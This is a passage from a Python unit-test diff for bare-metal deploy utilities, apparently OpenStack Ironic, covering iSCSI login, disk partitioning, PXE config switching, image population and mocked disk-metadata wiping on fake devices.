+ node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + def test_deploy_partition_image_with_ephemeral(self): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + configdrive_mb = 0 + ephemeral_format = 'exttest' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'swap': swap_part, + 'ephemeral': ephemeral_part, + 'root': root_part} + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(ephemeral_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.mkfs(dev=ephemeral_part, + fs=ephemeral_format, + label='ephemeral0'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image(address, port, iqn, + lun, image_path, + root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, + node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + def test_deploy_partition_image_preserve_ephemeral(self): + """"""Check if all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + ephemeral_format = 'exttest' + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'get_dev_block_size'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'swap': swap_part, + 'ephemeral': ephemeral_part, + 'root': root_part} + parent_mock.block_uuid.return_value = root_uuid + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=False, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(ephemeral_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, + preserve_ephemeral=True, boot_option=""netboot"") + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertFalse(parent_mock.get_dev_block_size.called) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + @mock.patch.object(common_utils, 'unlink_without_raise', autospec=True) + def test_deploy_partition_image_with_configdrive(self, mock_unlink): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 0 + ephemeral_mb = 0 + configdrive_mb = 10 + ephemeral_format = None + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + configdrive_url = 'http://127.0.0.1/cd' + + dev = '/dev/fake' + configdrive_part = '/dev/fake-part1' + root_part = '/dev/fake-part2' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'block_uuid', + 'notify', 'destroy_disk_metadata', 'dd', + '_get_configdrive'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part, + 'configdrive': + configdrive_part} + parent_mock._get_configdrive.return_value = (10, 'configdrive-path') + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call._get_configdrive(configdrive_url, + node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(configdrive_part), + mock.call.dd(mock.ANY, configdrive_part), + mock.call.populate_image(image_path, root_part), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, + configdrive=configdrive_url) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + mock_unlink.assert_called_once_with('configdrive-path') + + @mock.patch.object(utils, 'get_disk_identifier', autospec=True) + def test_deploy_whole_disk_image(self, mock_gdi): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + name_list = ['get_dev', 'discovery', 'login_iscsi', 'logout_iscsi', + 'delete_iscsi', 'is_block_device', 'populate_image', + 'notify'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.is_block_device.return_value = True + mock_gdi.return_value = '0x12345678' + calls_expected = [mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.populate_image(image_path, dev), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun, + image_path, node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual('0x12345678', uuid_dict_returned['disk identifier']) + + @mock.patch.object(common_utils, 'execute', autospec=True) + def test_verify_iscsi_connection_raises(self, mock_exec): + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.abc', ''] + self.assertRaises(exception.InstanceDeployFailure, + utils.verify_iscsi_connection, iqn) + self.assertEqual(3, mock_exec.call_count) + + @mock.patch.object(os.path, 'exists', autospec=True) + def test_check_file_system_for_iscsi_device_raises(self, mock_os): + iqn = 'iqn.xyz' + ip = ""127.0.0.1"" + port = ""22"" + mock_os.return_value = False + self.assertRaises(exception.InstanceDeployFailure, + utils.check_file_system_for_iscsi_device, ip, port, iqn) + self.assertEqual(3, mock_os.call_count) + + @mock.patch.object(os.path, 'exists', autospec=True) + def test_check_file_system_for_iscsi_device(self, mock_os): + iqn = 'iqn.xyz' + ip = ""127.0.0.1"" + port = ""22"" + check_dir = ""/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1"" % (ip, + port, + iqn) + + mock_os.return_value = True + utils.check_file_system_for_iscsi_device(ip, port, iqn) + mock_os.assert_called_once_with(check_dir) + + @mock.patch.object(common_utils, 'execute', autospec=True) + def test_verify_iscsi_connection(self, mock_exec): + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.xyz', ''] + utils.verify_iscsi_connection(iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-S', + run_as_root=True, + check_exit_code=[0]) + + @mock.patch.object(common_utils, 'execute', autospec=True) + def test_force_iscsi_lun_update(self, mock_exec): + iqn = 'iqn.xyz' + utils.force_iscsi_lun_update(iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-T', iqn, + '-R', + run_as_root=True, + check_exit_code=[0]) + + @mock.patch.object(common_utils, 'execute', autospec=True) + @mock.patch.object(utils, 'verify_iscsi_connection', autospec=True) + @mock.patch.object(utils, 'force_iscsi_lun_update', autospec=True) + @mock.patch.object(utils, 'check_file_system_for_iscsi_device', + autospec=True) + def test_login_iscsi_calls_verify_and_update(self, + mock_check_dev, + mock_update, + mock_verify, + mock_exec): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.xyz', ''] + utils.login_iscsi(address, port, iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-p', '%s:%s' % (address, port), + '-T', iqn, + '--login', + run_as_root=True, + check_exit_code=[0], + attempts=5, + delay_on_retry=True) + + mock_verify.assert_called_once_with(iqn) + + mock_update.assert_called_once_with(iqn) + + mock_check_dev.assert_called_once_with(address, port, iqn) + + @mock.patch.object(utils, 'is_block_device', lambda d: True) + def test_always_logout_and_delete_iscsi(self): + """"""Check if logout_iscsi() and delete_iscsi() are called. + + Make sure that logout_iscsi() and delete_iscsi() are called once + login_iscsi() is invoked. + + """""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + ephemeral_format = 'exttest' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + + class TestException(Exception): + pass + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'work_on_disk'] + patch_list = [mock.patch.object(utils, name, + spec_set=types.FunctionType) + for name in name_list] + mock_list = [patcher.start() for patcher in patch_list] + for patcher in patch_list: + self.addCleanup(patcher.stop) + + parent_mock = mock.MagicMock(spec=[]) + for mocker, name in zip(mock_list, name_list): + parent_mock.attach_mock(mocker, name) + + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.work_on_disk.side_effect = TestException + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.work_on_disk(dev, root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, image_path, + node_uuid, configdrive=None, + preserve_ephemeral=False, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + self.assertRaises(TestException, utils.deploy_partition_image, + address, port, iqn, lun, image_path, + root_mb, swap_mb, ephemeral_mb, ephemeral_format, + node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + + +class SwitchPxeConfigTestCase(tests_base.TestCase): + + def _create_config(self, ipxe=False, boot_mode=None): + (fd, fname) = tempfile.mkstemp() + if boot_mode == 'uefi': + pxe_cfg = _UEFI_PXECONF_DEPLOY + else: + pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY + os.write(fd, pxe_cfg) + os.close(fd) + self.addCleanup(os.unlink, fname) + return fname + + def test_switch_pxe_config_partition_image(self): + boot_mode = 'bios' + fname = self._create_config() + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_pxe_config_whole_disk_image(self): + boot_mode = 'bios' + fname = self._create_config() + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf) + + def test_switch_ipxe_config_partition_image(self): + boot_mode = 'bios' + cfg.CONF.set_override('ipxe_enabled', True, 'pxe') + fname = self._create_config(ipxe=True) + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_ipxe_config_whole_disk_image(self): + boot_mode = 'bios' + cfg.CONF.set_override('ipxe_enabled', True, 'pxe') + fname = self._create_config(ipxe=True) + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf) + + def test_switch_uefi_pxe_config_partition_image(self): + boot_mode = 'uefi' + fname = self._create_config(boot_mode=boot_mode) + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_uefi_config_whole_disk_image(self): + boot_mode = 'uefi' + fname = self._create_config(boot_mode=boot_mode) + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf) + + +@mock.patch('time.sleep', lambda sec: None) +class OtherFunctionTestCase(db_base.DbTestCase): + + def setUp(self): + super(OtherFunctionTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""fake_pxe"") + self.node = obj_utils.create_test_node(self.context, driver='fake_pxe') + + def test_get_dev(self): + expected = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + actual = utils.get_dev('127.0.0.1', 5678, 'iqn.fake', 9) + self.assertEqual(expected, actual) + + @mock.patch.object(os, 'stat', autospec=True) + @mock.patch.object(stat, 'S_ISBLK', autospec=True) + def test_is_block_device_works(self, mock_is_blk, mock_os): + device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + mock_is_blk.return_value = True + mock_os().st_mode = 10000 + self.assertTrue(utils.is_block_device(device)) + mock_is_blk.assert_called_once_with(mock_os().st_mode) + + @mock.patch.object(os, 'stat', autospec=True) + def test_is_block_device_raises(self, mock_os): + device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + mock_os.side_effect = OSError + self.assertRaises(exception.InstanceDeployFailure, + utils.is_block_device, device) + mock_os.assert_has_calls([mock.call(device)] * 3) + + @mock.patch.object(os.path, 'getsize', autospec=True) + @mock.patch.object(images, 'converted_size', autospec=True) + def test_get_image_mb(self, mock_csize, mock_getsize): + mb = 1024 * 1024 + + mock_getsize.return_value = 0 + mock_csize.return_value = 0 + self.assertEqual(0, utils.get_image_mb('x', False)) + self.assertEqual(0, utils.get_image_mb('x', True)) + mock_getsize.return_value = 1 + mock_csize.return_value = 1 + self.assertEqual(1, utils.get_image_mb('x', False)) + self.assertEqual(1, utils.get_image_mb('x', True)) + mock_getsize.return_value = mb + mock_csize.return_value = mb + self.assertEqual(1, utils.get_image_mb('x', False)) + self.assertEqual(1, utils.get_image_mb('x', True)) + mock_getsize.return_value = mb + 1 + mock_csize.return_value = mb + 1 + self.assertEqual(2, utils.get_image_mb('x', False)) + self.assertEqual(2, utils.get_image_mb('x', True)) + + def test_parse_root_device_hints(self): + self.node.properties['root_device'] = {'wwn': 123456} + expected = 'wwn=123456' + result = utils.parse_root_device_hints(self.node) + self.assertEqual(expected, result) + + def test_parse_root_device_hints_string_space(self): + self.node.properties['root_device'] = {'model': 'fake model'} + expected = 'model=fake%20model' + result = utils.parse_root_device_hints(self.node) + self.assertEqual(expected, result) + + def test_parse_root_device_hints_no_hints(self): + self.node.properties = {} + result = utils.parse_root_device_hints(self.node) + self.assertIsNone(result) + + def test_parse_root_device_hints_invalid_hints(self): + self.node.properties['root_device'] = {'vehicle': 'Owlship'} + self.assertRaises(exception.InvalidParameterValue, + utils.parse_root_device_hints, self.node) + + def test_parse_root_device_hints_invalid_size(self): + self.node.properties['root_device'] = {'size': 'not-int'} + self.assertRaises(exception.InvalidParameterValue, + utils.parse_root_device_hints, self.node) + + +@mock.patch.object(disk_partitioner.DiskPartitioner, 'commit', lambda _: None) +class WorkOnDiskTestCase(tests_base.TestCase): + + def setUp(self): + super(WorkOnDiskTestCase, self).setUp() + self.image_path = '/tmp/xyz/image' + self.root_mb = 128 + self.swap_mb = 64 + self.ephemeral_mb = 0 + self.ephemeral_format = None + self.configdrive_mb = 0 + self.dev = '/dev/fake' + self.swap_part = '/dev/fake-part1' + self.root_part = '/dev/fake-part2' + + self.mock_ibd_obj = mock.patch.object( + utils, 'is_block_device', autospec=True) + self.mock_ibd = self.mock_ibd_obj.start() + self.addCleanup(self.mock_ibd_obj.stop) + self.mock_mp_obj = mock.patch.object( + utils, 'make_partitions', autospec=True) + self.mock_mp = self.mock_mp_obj.start() + self.addCleanup(self.mock_mp_obj.stop) + self.mock_remlbl_obj = mock.patch.object( + utils, 'destroy_disk_metadata', autospec=True) + self.mock_remlbl = self.mock_remlbl_obj.start() + self.addCleanup(self.mock_remlbl_obj.stop) + self.mock_mp.return_value = {'swap': self.swap_part, + 'root': self.root_part} + + def test_no_root_partition(self): + self.mock_ibd.return_value = False + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid') + self.mock_ibd.assert_called_once_with(self.root_part) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + def test_no_swap_partition(self): + self.mock_ibd.side_effect = iter([True, False]) + calls = [mock.call(self.root_part), + mock.call(self.swap_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid') + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + def test_no_ephemeral_partition(self): + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + ephemeral_mb = 256 + ephemeral_format = 'exttest' + + self.mock_mp.return_value = {'ephemeral': ephemeral_part, + 'swap': swap_part, + 'root': root_part} + self.mock_ibd.side_effect = iter([True, True, False]) + calls = [mock.call(root_part), + mock.call(swap_part), + mock.call(ephemeral_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, ephemeral_mb, ephemeral_format, + self.image_path, 'fake-uuid') + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + @mock.patch.object(common_utils, 'unlink_without_raise', autospec=True) + @mock.patch.object(utils, '_get_configdrive', autospec=True) + def test_no_configdrive_partition(self, mock_configdrive, mock_unlink): + mock_configdrive.return_value = (10, 'fake-path') + swap_part = '/dev/fake-part1' + configdrive_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + configdrive_url = 'http://127.0.0.1/cd' + configdrive_mb = 10 + + self.mock_mp.return_value = {'swap': swap_part, + 'configdrive': configdrive_part, + 'root': root_part} + self.mock_ibd.side_effect = iter([True, True, False]) + calls = [mock.call(root_part), + mock.call(swap_part), + mock.call(configdrive_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid', + preserve_ephemeral=False, + configdrive=configdrive_url, + boot_option=""netboot"") + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + mock_unlink.assert_called_once_with('fake-path') + + +@mock.patch.object(common_utils, 'execute', autospec=True) +class MakePartitionsTestCase(tests_base.TestCase): + + def setUp(self): + super(MakePartitionsTestCase, self).setUp() + self.dev = 'fake-dev' + self.root_mb = 1024 + self.swap_mb = 512 + self.ephemeral_mb = 0 + self.configdrive_mb = 0 + self.parted_static_cmd = ['parted', '-a', 'optimal', '-s', self.dev, + '--', 'unit', 'MiB', 'mklabel', 'msdos'] + + def _test_make_partitions(self, mock_exc, boot_option): + mock_exc.return_value = (None, None) + utils.make_partitions(self.dev, self.root_mb, self.swap_mb, + self.ephemeral_mb, self.configdrive_mb, + boot_option=boot_option) + + expected_mkpart = ['mkpart', 'primary', 'linux-swap', '1', '513', + 'mkpart', 'primary', '', '513', '1537'] + if boot_option == ""local"": + expected_mkpart.extend(['set', '2', 'boot', 'on']) + parted_cmd = self.parted_static_cmd + expected_mkpart + parted_call = mock.call(*parted_cmd, run_as_root=True, + check_exit_code=[0]) + fuser_cmd = ['fuser', 'fake-dev'] + fuser_call = mock.call(*fuser_cmd, run_as_root=True, + check_exit_code=[0, 1]) + mock_exc.assert_has_calls([parted_call, fuser_call]) + + def test_make_partitions(self, mock_exc): + self._test_make_partitions(mock_exc, boot_option=""netboot"") + + def test_make_partitions_local_boot(self, mock_exc): + self._test_make_partitions(mock_exc, boot_option=""local"") + + def test_make_partitions_with_ephemeral(self, mock_exc): + self.ephemeral_mb = 2048 + expected_mkpart = ['mkpart', 'primary', '', '1', '2049', + 'mkpart', 'primary', 'linux-swap', '2049', '2561', + 'mkpart', 'primary', '', '2561', '3585'] + cmd = self.parted_static_cmd + expected_mkpart + mock_exc.return_value = (None, None) + utils.make_partitions(self.dev, self.root_mb, self.swap_mb, + self.ephemeral_mb, self.configdrive_mb) + + parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0]) + mock_exc.assert_has_calls([parted_call]) + + +@mock.patch.object(utils, 'get_dev_block_size', autospec=True) +@mock.patch.object(common_utils, 'execute', autospec=True) +class DestroyMetaDataTestCase(tests_base.TestCase): + + def setUp(self): + super(DestroyMetaDataTestCase, self).setUp() + self.dev = 'fake-dev' + self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + def test_destroy_disk_metadata(self, mock_exec, mock_gz): + mock_gz.return_value = 64 + expected_calls = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0]), + mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', 'seek=28', + run_as_root=True, + check_exit_code=[0])] + utils.destroy_disk_metadata(self.dev, self.node_uuid) + mock_exec.assert_has_calls(expected_calls) + self.assertTrue(mock_gz.called) + + def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz): + mock_gz.side_effect = processutils.ProcessExecutionError + + expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0])] + self.assertRaises(processutils.ProcessExecutionError, + utils.destroy_disk_metadata, + self.dev, + self.node_uuid) + mock_exec.assert_has_calls(expected_call) + + def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz): + mock_exec.side_effect = processutils.ProcessExecutionError + + expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0])] + self.assertRaises(processutils.ProcessExecutionError, + utils.destroy_disk_metadata, + self.dev, + self.node_uuid) + mock_exec.assert_has_calls(expected_call) + self.assertFalse(mock_gz.called) + + +@mock.patch.object(common_utils, 'execute', autospec=True) +class GetDeviceBlockSizeTestCase(tests_base.TestCase): + + def setUp(self): + super(GetDeviceBlockSizeTestCase, self).setUp() + self.dev = 'fake-dev' + self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + def test_get_dev_block_size(self, mock_exec): + mock_exec.return_value = (""64"", """") + expected_call = [mock.call('blockdev', '--getsz', self.dev, + run_as_root=True, check_exit_code=[0])] + utils.get_dev_block_size(self.dev) + mock_exec.assert_has_calls(expected_call) + + +@mock.patch.object(utils, 'dd', autospec=True) +@mock.patch.object(images, 'qemu_img_info', autospec=True) +@mock.patch.object(images, 'convert_image', autospec=True) +class PopulateImageTestCase(tests_base.TestCase): + + def setUp(self): + super(PopulateImageTestCase, self).setUp() + + def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd): + type(mock_qinfo.return_value).file_format = mock.PropertyMock( + return_value='raw') + utils.populate_image('src', 'dst') + mock_dd.assert_called_once_with('src', 'dst') + self.assertFalse(mock_cg.called) + + def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd): + type(mock_qinfo.return_value).file_format = mock.PropertyMock( + return_value='qcow2') + utils.populate_image('src', 'dst') + mock_cg.assert_called_once_with('src', 'dst', 'raw', True) + self.assertFalse(mock_dd.called) + + +@mock.patch.object(utils, 'is_block_device', lambda d: True) +@mock.patch.object(utils, 'block_uuid', lambda p: 'uuid') +@mock.patch.object(utils, 'dd', lambda *_: None) +@mock.patch.object(images, 'convert_image', lambda *_: None) +@mock.patch.object(common_utils, 'mkfs', lambda *_: None) +# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it +@mock.patch.object(utils, 'destroy_disk_metadata', lambda *_: None) +class RealFilePartitioningTestCase(tests_base.TestCase): + """"""This test applies some real-world partitioning scenario to a file. + + This test covers the whole partitioning, mocking everything not possible + on a file. That helps us assure, that we do all partitioning math properly + and also conducts integration testing of DiskPartitioner. + """""" + + def setUp(self): + super(RealFilePartitioningTestCase, self).setUp() + # NOTE(dtantsur): no parted utility on gate-ironic-python26 + try: + common_utils.execute('parted', '--version') + except OSError as exc: + self.skipTest('parted utility was not found: %s' % exc) + self.file = tempfile.NamedTemporaryFile(delete=False) + # NOTE(ifarkas): the file needs to be closed, so fuser won't report + # any usage + self.file.close() + # NOTE(dtantsur): 20 MiB file with zeros + common_utils.execute('dd', 'if=/dev/zero', 'of=%s' % self.file.name, + 'bs=1', 'count=0', 'seek=20MiB') + + @staticmethod + def _run_without_root(func, *args, **kwargs): + """"""Make sure root is not required when using utils.execute."""""" + real_execute = common_utils.execute + + def fake_execute(*cmd, **kwargs): + kwargs['run_as_root'] = False + return real_execute(*cmd, **kwargs) + + with mock.patch.object(common_utils, 'execute', fake_execute): + return func(*args, **kwargs) + + def test_different_sizes(self): + # NOTE(dtantsur): Keep this list in order with expected partitioning + fields = ['ephemeral_mb', 'swap_mb', 'root_mb'] + variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10)) + for variant in variants: + kwargs = dict(zip(fields, variant)) + self._run_without_root(utils.work_on_disk, self.file.name, + ephemeral_format='ext4', node_uuid='', + image_path='path', **kwargs) + part_table = self._run_without_root( + disk_partitioner.list_partitions, self.file.name) + for part, expected_size in zip(part_table, filter(None, variant)): + self.assertEqual(expected_size, part['size'], + ""comparison failed for %s"" % list(variant)) + + def test_whole_disk(self): + # 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR + # + 1 MiB MAGIC == 20 MiB whole disk + # TODO(dtantsur): figure out why we need 'magic' 1 more MiB + # and why the is different on Ubuntu and Fedora (see below) + self._run_without_root(utils.work_on_disk, self.file.name, + root_mb=9, ephemeral_mb=6, swap_mb=3, + ephemeral_format='ext4', node_uuid='', + image_path='path') + part_table = self._run_without_root( + disk_partitioner.list_partitions, self.file.name) + sizes = [part['size'] for part in part_table] + # NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB, + # parted in Fedora 20 won't - thus two possible variants for last part + self.assertEqual([6, 3], sizes[:2], + ""unexpected partitioning %s"" % part_table) + self.assertIn(sizes[2], (9, 10)) + + @mock.patch.object(image_cache, 'clean_up_caches', autospec=True) + def test_fetch_images(self, mock_clean_up_caches): + + mock_cache = mock.MagicMock( + spec_set=['fetch_image', 'master_dir'], master_dir='master_dir') + utils.fetch_images(None, mock_cache, [('uuid', 'path')]) + mock_clean_up_caches.assert_called_once_with(None, 'master_dir', + [('uuid', 'path')]) + mock_cache.fetch_image.assert_called_once_with('uuid', 